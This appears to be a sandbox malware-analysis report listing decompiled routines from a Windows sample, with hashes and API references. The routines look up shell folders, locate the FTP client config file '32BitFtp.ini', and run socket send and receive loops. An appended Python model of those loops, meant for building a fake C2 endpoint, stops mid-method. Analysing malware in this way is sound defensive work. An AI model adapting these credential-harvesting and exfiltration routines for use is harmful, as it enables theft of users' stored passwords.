                                                                    • API String ID: 1884169789-2776585315
                                                                    • Opcode ID: 9f2afe7237929f859a56fa488468728360c5d6e741fae9cd32d000a34098b0dc
                                                                    • Instruction ID: 012631f08c3f720db82d748fc1356d0498b941b070556770c17d11d6cf9e9cf7
                                                                    • Opcode Fuzzy Hash: 9f2afe7237929f859a56fa488468728360c5d6e741fae9cd32d000a34098b0dc
                                                                    • Instruction Fuzzy Hash: DBF03670580104F9EF117BA1CC47FAD7E76DF10748F20417A7900741F1DAB99B91965C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 68%
                                                                    			E00401EB1(void* __eflags, signed int _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* _t12;
                                                                    				intOrPtr _t19;
                                                                    				intOrPtr* _t21;
                                                                    
                                                                    				_v8 = E004018CF(0x105);
                                                                    				if( *0x414b7d != 0) {
                                                                    					_t12 =  *0x414b7d(0, _a4, 0, 0, _v8); // executed
                                                                    					if(_t12 < 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					E004018B8(_v8);
                                                                    					_v8 = 0;
                                                                    					_t21 = 0x414b81;
                                                                    					while( *_t21 != 0) {
                                                                    						_t20 =  *_t21;
                                                                    						if( *((intOrPtr*)( *_t21 + 4)) != (_a4 & 0xffff7fff)) {
                                                                    							L7:
                                                                    							_t21 = _t21 + 4;
                                                                    							continue;
                                                                    						} else {
                                                                    							_t19 = E00401D71( *_t20, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", _t20 + 8, 0);
                                                                    							if(_t19 == 0) {
                                                                    								goto L7;
                                                                    							} else {
                                                                    								_v8 = _t19;
                                                                    							}
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    				L9:
                                                                    				return _v8;
                                                                    			}







                                                                    Instruction addresses (one per decompiled line): 0x00401ec2 0x00401ecc 0x00401edc 0x00401ee4 0x00000000 0x00000000 0x00401ece 0x00401ee6 0x00401ee9 0x00401eee 0x00401ef5 0x00401f29 0x00401efc 0x00401f09 0x00401f26 0x00401f26 0x00000000 0x00401f0b 0x00401f1d 0x00401f1f 0x00000000 0x00401f21 0x00401f21 0x00401f21 0x00401f1f 0x00000000 0x00401f09 0x00401f29 0x00401f2e 0x00401f33

                                                                    APIs
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocFolderLocalPath
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 1254228173-2036018995
                                                                    • Opcode ID: 56f2e342e5eafcf3341f7299bb2d4cc3d53dd96be20be7e6c5c16e348e6a22ea
                                                                    • Instruction ID: 7738f67dd9614b2846b3a2efeb9c4eebaa8b985614ff96bd2da1bef5687651b4
                                                                    • Opcode Fuzzy Hash: 56f2e342e5eafcf3341f7299bb2d4cc3d53dd96be20be7e6c5c16e348e6a22ea
                                                                    • Instruction Fuzzy Hash: A8018436A0420AEBDB109F54CD02F9EB7A5EB44354F208177F501BB2E0E778DA50DB89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00407E69(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				char _v269;
                                                                    				int _t11;
                                                                    				void* _t17;
                                                                    				void* _t18;
                                                                    				void* _t19;
                                                                    
                                                                    				_t19 = __edi;
                                                                    				_t18 = __ecx;
                                                                    				_t17 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x1d, 0);
                                                                    				_t11 = GetWindowsDirectoryA( &_v269, 0x104);
                                                                    				if(_t11 != 0) {
                                                                    					_t21 = _t11 - 0x104;
                                                                    					if(_t11 <= 0x104) {
                                                                    						E0040406C(_a4, E00401DF8( &_v269,  &_v269, "\\32BitFtp.ini"), 0xbeef0000); // executed
                                                                    						E004018B8(_t14);
                                                                    					}
                                                                    				}
                                                                    				return E00401636(_t17, _t18, _t19, _t21, _a4, _v8);
                                                                    			}









                                                                    Instruction addresses (one per decompiled line): 0x00407e69 0x00407e69 0x00407e69 0x00407e7e 0x00407e92 0x00407e94 0x00407e96 0x00407e9b 0x00407eb8 0x00407ebd 0x00407ebd 0x00407e9b 0x00407ece

                                                                    APIs
                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                                                    • String ID: \32BitFtp.ini
                                                                    • API String ID: 2776971706-1260517637
                                                                    • Opcode ID: 47931a09d2735367c308d23eac085567dd67203f5abc229086505a3d133c96b4
                                                                    • Instruction ID: cbf003877d027d6a197ada6978e58f7ea5a3bd39d8541963de42c9327f17cd29
                                                                    • Opcode Fuzzy Hash: 47931a09d2735367c308d23eac085567dd67203f5abc229086505a3d133c96b4
                                                                    • Instruction Fuzzy Hash: C3F08970A00108BAEB10BB61CC42FDE791D9B40344F104077B704B51E2DAB99F80969D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 88%
                                                                    			E004024D6(CHAR* _a4, _Unknown_base(*)()** _a8) {
                                                                    				struct HINSTANCE__* _t4;
                                                                    				struct HINSTANCE__* _t5;
                                                                    				_Unknown_base(*)()* _t8;
                                                                    				_Unknown_base(*)()* _t9;
                                                                    				struct HINSTANCE__* _t10;
                                                                    				CHAR* _t12;
                                                                    				_Unknown_base(*)()** _t13;
                                                                    
                                                                    				_t4 = LoadLibraryA(_a4); // executed
                                                                    				_t5 = _t4;
                                                                    				if(_t5 != 0) {
                                                                    					_t12 = _a4;
                                                                    					_t10 = _t5;
                                                                    					_t13 = _a8;
                                                                    					while(1) {
                                                                    						asm("cld");
                                                                    						asm("repne scasb");
                                                                    						if( *_t12 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t8 = GetProcAddress(_t10, _t12); // executed
                                                                    						_t9 = _t8;
                                                                    						if(_t9 != 0) {
                                                                    							 *_t13 = _t9;
                                                                    							_t13 = _t13 + 4;
                                                                    							continue;
                                                                    						} else {
                                                                    							return _t9;
                                                                    						}
                                                                    						goto L8;
                                                                    					}
                                                                    					return 1;
                                                                    				} else {
                                                                    					return _t5;
                                                                    				}
                                                                    				L8:
                                                                    			}

                                                                    Addresses: 0x004024df, 0x004024e5, 0x004024e7, 0x004024f0, 0x004024f4, 0x004024f7, 0x004024fa, 0x004024fc, 0x00402503, 0x00402509, 0x00000000, 0x00000000, 0x0040250d, 0x00402512, 0x00402514, 0x0040251d, 0x0040251f, 0x00000000, 0x0040251a, 0x0040251a, 0x0040251a, 0x00000000, 0x00402514, 0x0040252d, 0x004024ed, 0x004024ed, 0x004024ed, 0x00000000

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?), ref: 004024DF
                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040250D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID:
                                                                    • API String ID: 2574300362-0
                                                                    • Opcode ID: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                                                                    • Instruction ID: fbc1fe3612a262e3ea9a0b223a66db08094d4ab5f536d4fd90f1adfdd8ad2806
                                                                    • Opcode Fuzzy Hash: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                                                                    • Instruction Fuzzy Hash: 20F09A732051142ADB106A3AAC4499B6B88E7E33B8B105137E806A62C1E5B9DD8682A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 62%
                                                                    			E0040E566(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				char _v12;
                                                                    				void* _t14;
                                                                    
                                                                    				if( *0x414b57 != 0) {
                                                                    					_v8 = E004018CF(0x105);
                                                                    					_v12 = 0x104;
                                                                    					_t14 =  *0x414b57(_a8, _a8, _v8,  &_v12); // executed
                                                                    					_push(_v8);
                                                                    					L0041066A();
                                                                    					if(_t14 > 3) {
                                                                    						E00404351(_a4, _v8, ".xml", 0xbeef0000);
                                                                    					}
                                                                    					return E004018B8(_v8);
                                                                    				} else {
                                                                    					return __eax;
                                                                    				}
                                                                    			}

                                                                    Addresses: 0x0040e573, 0x0040e583, 0x0040e586, 0x0040e59a, 0x0040e5a0, 0x0040e5a3, 0x0040e5ab, 0x0040e5bd, 0x0040e5bd, 0x0040e5cb, 0x0040e576, 0x0040e576, 0x0040e576

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: .xml
                                                                    • API String ID: 1659193697-2937849440
                                                                    • Opcode ID: 1c5bbdcc3d911d9b91bbd0106df6c2713ab6e1bad338dff2e9ebbcafa85cc281
                                                                    • Instruction ID: d50f8ccee8f7243a6a0ed472ec34bd5e2a0a6362bf3d9178c3556d4465c1c39f
                                                                    • Opcode Fuzzy Hash: 1c5bbdcc3d911d9b91bbd0106df6c2713ab6e1bad338dff2e9ebbcafa85cc281
                                                                    • Instruction Fuzzy Hash: 69F03A32900108FADF11BBD1CC42ECDBB76AB50308F208576B660B51B0D7B99BA4EB48
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E00401F36(int _a4) {
                                                                    				char* _t4;
                                                                    				void* _t10;
                                                                    
                                                                    				_t4 = _a4;
                                                                    				if(_t4 == 0 ||  *_t4 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(3);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(0x80);
                                                                    					ExitProcess(_a4); // executed
                                                                    					_t10 = _t4 + 1;
                                                                    					if(_t10 != 0) {
                                                                    						CloseHandle(_t10);
                                                                    						return 1;
                                                                    					}
                                                                    					return 0;
                                                                    				}
                                                                    			}

                                                                    Addresses: 0x00401f3d, 0x00401f3f, 0x00401f4d, 0x00401f50, 0x00401f50, 0x00401f52, 0x00401f54, 0x00401f56, 0x00401f58, 0x00401f5a, 0x00401f62, 0x00401f6b, 0x00401f6c, 0x00401f6f, 0x00000000, 0x00401f74, 0x00401f7b, 0x00401f7b

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F62
                                                                    • CloseHandle.KERNEL32(00000000,?,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00401F6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseExitHandleProcess
                                                                    • String ID:
                                                                    • API String ID: 1046136549-0
                                                                    • Opcode ID: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                                                                    • Instruction ID: ff3804100ddf8c199ee2f8612031d1c0044171ab4ec93654cd43e20a2e279d87
                                                                    • Opcode Fuzzy Hash: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                                                                    • Instruction Fuzzy Hash: C6E04F7235024537EB3155699C83F46258857127A8F104032B345FD2D1DAE9E9D0425C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E004037C6(void* __eax, intOrPtr _a4) {
                                                                    				void* _t5;
                                                                    				intOrPtr* _t7;
                                                                    
                                                                    				_push(_a4);
                                                                    				L0041082C();
                                                                    				if(__eax == 0xffffffff) {
                                                                    					_push(_a4);
                                                                    					L00410832(); // executed
                                                                    					_t5 = __eax;
                                                                    					if(_t5 != 0) {
                                                                    						_t7 =  *((intOrPtr*)(_t5 + 0xc));
                                                                    						if(_t7 != 0) {
                                                                    							return  *((intOrPtr*)( *_t7));
                                                                    						}
                                                                    						return 0xffffffff;
                                                                    					}
                                                                    					return 0xffffffff;
                                                                    				}
                                                                    				return __eax;
                                                                    			}

                                                                    Addresses: 0x004037c9, 0x004037cc, 0x004037d4, 0x004037d6, 0x004037d9, 0x004037de, 0x004037e0, 0x004037ed, 0x004037ef, 0x00000000, 0x004037fa, 0x00000000, 0x004037f1, 0x00000000, 0x004037e2, 0x004037fd

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: gethostbynameinet_addr
                                                                    • String ID:
                                                                    • API String ID: 1594361348-0
                                                                    • Opcode ID: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                                                                    • Instruction ID: 5e93a2d41fda1c27195ed80854e744a6a241ee01f30d7083f3dbc766825ad624
                                                                    • Opcode Fuzzy Hash: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                                                                    • Instruction Fuzzy Hash: D5E04FB420440A9FCA11AE3DC8428557F987B163B93108333F130EB2F1D778D941A749
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			E00403850(intOrPtr __eax) {
                                                                    				void* _t4;
                                                                    				void* _t8;
                                                                    
                                                                    				 *((intOrPtr*)(_t8 - 0xc)) = __eax;
                                                                    				_push(0x10);
                                                                    				_t4 = _t8 - 0x10;
                                                                    				_push(_t4);
                                                                    				_push(0); // executed
                                                                    				L0041083E(); // executed
                                                                    				if(_t4 == 0xffffffff) {
                                                                    					_push(0);
                                                                    					L00410844();
                                                                    				}
                                                                    				return 0;
                                                                    			}

                                                                    Addresses: 0x00403861, 0x00403864, 0x00403866, 0x00403869, 0x0040386a, 0x0040386b, 0x00403873, 0x00403875, 0x00403876, 0x0040387b, 0x00403881

                                                                    APIs
                                                                    • connect.WSOCK32(00000000,00000002,00000010,00000002,00000001,00000006), ref: 0040386B
                                                                    • closesocket.WSOCK32(00000000,00000000,00000002,00000010,00000002,00000001,00000006), ref: 00403876
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketconnect
                                                                    • String ID:
                                                                    • API String ID: 1323028321-0
                                                                    • Opcode ID: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                                                                    • Instruction ID: 2c0b4ed7b26df5b6c8b3ddf8a33cbfcd02c62134e5053cecd8bd2a5708bf71a2
                                                                    • Opcode Fuzzy Hash: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                                                                    • Instruction Fuzzy Hash: B5D0C972A042046AD700BABA5CC1EBEA69CAF10328F109A7BB526E51C2D5BCC584D629
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041062F() {
                                                                    				signed int _t5;
                                                                    				signed int _t6;
                                                                    				void* _t8;
                                                                    				signed int _t9;
                                                                    
                                                                    				L0:
                                                                    				while(1) {
                                                                    					L0:
                                                                    					_t5 = GetTickCount();
                                                                    					L1:
                                                                    					 *_t5 =  *_t5 + _t5;
                                                                    					 *((intOrPtr*)(_t9 + 0xa)) =  *((intOrPtr*)(_t9 + 0xa)) + _t8;
                                                                    					_t6 = _t5 / _t9;
                                                                    					_t13 = _t5 % _t9 - 5;
                                                                    					if(_t5 % _t9 != 5) {
                                                                    						L3:
                                                                    						continue;
                                                                    					}
                                                                    					L2:
                                                                    					L4:
                                                                    					E004105C3(_t6, _t13);
                                                                    					ExitProcess(0); // executed
                                                                    					L5:
                                                                    					goto ( *0x418148);
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0041062F
                                                                    • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CountExitProcessTick
                                                                    • String ID:
                                                                    • API String ID: 232575682-0
                                                                    • Opcode ID: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
                                                                    • Instruction ID: 1157fecdfa7adbe7534eede1c2d4befca9c0b9d0b40d7f3ba9e62a443b5a47ca
                                                                    • Opcode Fuzzy Hash: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
                                                                    • Instruction Fuzzy Hash: 26C04C3075510454D79462A295567ED100347D5708F51801BA11A541868CDC0AF6151F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 81%
                                                                    			E004039A2(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                    				char _v2052;
                                                                    				void* _t14;
                                                                    				void* _t17;
                                                                    				intOrPtr _t19;
                                                                    				char* _t20;
                                                                    				void* _t23;
                                                                    				intOrPtr _t24;
                                                                    
                                                                    				_t24 = 0;
                                                                    				_t14 = E004038D0(_a4, 0x5a); // executed
                                                                    				if(_t14 != 0) {
                                                                    					while(1) {
                                                                    						_t17 = E004038D0(_a4, 0x5a); // executed
                                                                    						if(_t17 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						__eflags = _a12 - 0x800;
                                                                    						if(_a12 <= 0x800) {
                                                                    							_t19 = _a12;
                                                                    						} else {
                                                                    							_t19 = 0x800;
                                                                    						}
                                                                    						_push(0);
                                                                    						_push(_t19);
                                                                    						_t20 =  &_v2052;
                                                                    						_push(_t20);
                                                                    						_push(_a4);
                                                                    						L00410856(); // executed
                                                                    						__eflags = _t20;
                                                                    						if(__eflags >= 0) {
                                                                    							if(__eflags != 0) {
                                                                    								 *((intOrPtr*)( *_a8 + 0x10))(_a8,  &_v2052, _t20, 0, _t20);
                                                                    								_pop(_t23);
                                                                    								_a12 = _a12 - _t23;
                                                                    								__eflags = _a12;
                                                                    								if(_a12 != 0) {
                                                                    									__eflags = _t24;
                                                                    									if(_t24 == 0) {
                                                                    										continue;
                                                                    									}
                                                                    								} else {
                                                                    									_t24 = _t24 + 1;
                                                                    								}
                                                                    							} else {
                                                                    								_t24 = _t24 + 1;
                                                                    							}
                                                                    						} else {
                                                                    						}
                                                                    						goto L13;
                                                                    					}
                                                                    				}
                                                                    				L13:
                                                                    				return _t24;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004038D0: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                                                                    • 6FC11E90.WSOCK32(?,?,00000800,00000000), ref: 004039EC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: select
                                                                    • String ID:
                                                                    • API String ID: 1274211008-0
                                                                    • Opcode ID: 69b0589e83bec19c8e9aae5d3ba801705d1d6016f0d4b8e48cd570a5aa8ad3ce
                                                                    • Instruction ID: 2f40260d67330ca774b86e0443aa4ef1630bdb93cf1b4663f33e685bee7b00eb
                                                                    • Opcode Fuzzy Hash: 69b0589e83bec19c8e9aae5d3ba801705d1d6016f0d4b8e48cd570a5aa8ad3ce
                                                                    • Instruction Fuzzy Hash: 3401A171710209AFDF109E24CC41BAB3B9CBB04306F208237B992A61C0D7B8DB559F99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E00403930(void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v5;
                                                                    				void* _t13;
                                                                    				void* _t16;
                                                                    				char* _t18;
                                                                    				void* _t22;
                                                                    				char* _t23;
                                                                    				void* _t26;
                                                                    
                                                                    				_t26 = __edi;
                                                                    				_t23 = 0;
                                                                    				_t13 = E004038D0(_a4, 0x5a); // executed
                                                                    				if(_t13 != 0) {
                                                                    					while(1) {
                                                                    						_t16 = E004038D0(_a4, 0x5a); // executed
                                                                    						if(_t16 == 0) {
                                                                    							break;
                                                                    						}
                                                                    						_push(0);
                                                                    						_push(1);
                                                                    						_t18 =  &_v5;
                                                                    						_push(_t18);
                                                                    						_push(_a4);
                                                                    						L00410856(); // executed
                                                                    						__eflags = _t18;
                                                                    						if(_t18 > 0) {
                                                                    							__eflags = _v5 - _a16;
                                                                    							if(__eflags == 0) {
                                                                    								_t23 = 1;
                                                                    							}
                                                                    							_t22 = E00401082( *((intOrPtr*)( *_a8 + 0x10))(_a8,  &_v5, 1, 0), _t26, __eflags, _a8);
                                                                    							__eflags = _t22 - _a12;
                                                                    							if(_t22 < _a12) {
                                                                    								__eflags = _t23;
                                                                    								if(_t23 == 0) {
                                                                    									continue;
                                                                    								}
                                                                    							} else {
                                                                    							}
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    				}
                                                                    				L9:
                                                                    				return _t23;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004038D0: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                                                                    • 6FC11E90.WSOCK32(?,?,00000001,00000000), ref: 00403962
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: select
                                                                    • String ID:
                                                                    • API String ID: 1274211008-0
                                                                    • Opcode ID: a7b6f319686e6ebda70a209903e400caaa9050ca94bf6d932e9478b3526deab0
                                                                    • Instruction ID: 8c0b6cfc6c1c11aca7b90cc778563e244997239a44563fd1294608556312e14e
                                                                    • Opcode Fuzzy Hash: a7b6f319686e6ebda70a209903e400caaa9050ca94bf6d932e9478b3526deab0
                                                                    • Instruction Fuzzy Hash: 9101BC70204209BBDF10AE95DC82FAE3F69AB0130AF108137F900AA1E1D7B9DB418759
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E00403884(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                    				void* _t8;
                                                                    				void* _t11;
                                                                    				intOrPtr _t12;
                                                                    
                                                                    				if(_a12 != 0) {
                                                                    					_t12 = _a8;
                                                                    					_t11 = 0;
                                                                    					while(1) {
                                                                    						_push(0);
                                                                    						_push(_a12);
                                                                    						_push(_t12);
                                                                    						_push(_a4);
                                                                    						L0041084A(); // executed
                                                                    						if(_t8 <= 0) {
                                                                    							break;
                                                                    						}
                                                                    						_t12 = _t12 + _t8;
                                                                    						_a12 = _a12 - _t8;
                                                                    						if(_a12 != 0) {
                                                                    							continue;
                                                                    						} else {
                                                                    							_t11 = 1;
                                                                    						}
                                                                    						break;
                                                                    					}
                                                                    					return _t11;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}
                                                                    APIs
                                                                    • send.WSOCK32(?,?,00000000,00000000), ref: 004038AB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: send
                                                                    • String ID:
                                                                    • API String ID: 2809346765-0
                                                                    • Opcode ID: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                                                                    • Instruction ID: 7010a4d4224b84c81328f756437b4738d149add1ed75441a8268b8f5070a40e4
                                                                    • Opcode Fuzzy Hash: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                                                                    • Instruction Fuzzy Hash: 4BF0E533614308ABEB106E15CC40B9B3B9CEB90759F14883BF901A62C0D3BDDA958359
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
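The three WSOCK32 helpers decompiled above (E004039A2, E00403930 and E00403884) are the sample's chunked receive, read-until-terminator and send-all loops; E00401422 further down is the same send-all pattern over WriteFile. The following is an added reference model of those loops, written for this page and not the sample's or Joe Sandbox's code, of the kind an analyst writes before building a fake C2 endpoint that satisfies the loader's reads. It assumes, since the page does not say so, that E004038D0(sock, 0x5a) is a select() readiness wait whose 0x5a argument is a timeout in seconds, that the vtable slot at +0x10 appends bytes to a growable buffer object, and that E00401082(obj) returns that buffer's current length. The FakeSocket class and the exchange bytes are constructed so the loops run offline.

```python
"""Reference model of the socket helpers decompiled above (added example,
not the sample's own code):

  E00403884 -> send_all    loop on send() until every byte is out, 1 on success
  E004039A2 -> recv_up_to  read up to `length` bytes in 0x800-byte recv() calls
  E00403930 -> recv_until  read one byte at a time until a terminator byte

Assumptions not stated on the page: E004038D0(sock, 0x5a) is a select()
readiness wait with a 0x5a (90) second timeout; the vtable slot at +0x10
appends bytes to a buffer object; E00401082(obj) returns its current length.
"""

RECV_CHUNK = 0x800    # chunk size hard-coded in E004039A2
WAIT_TIMEOUT = 0x5a   # value passed to E004038D0 (assumed: seconds)


class FakeSocket:
    """Constructed stand-in for a Winsock socket so the loops run offline.
    `chunks` scripts what recv() sees: bytes = data on the wire, b"" = peer
    closed, None = select() timeout. send() takes at most `max_send` bytes
    per call so the partial-send path is exercised."""

    def __init__(self, chunks, max_send=3):
        self.chunks = list(chunks)
        self.max_send = max_send
        self.sent = bytearray()
        self.pending = b""
        self.closed = False

    def wait_readable(self, timeout):
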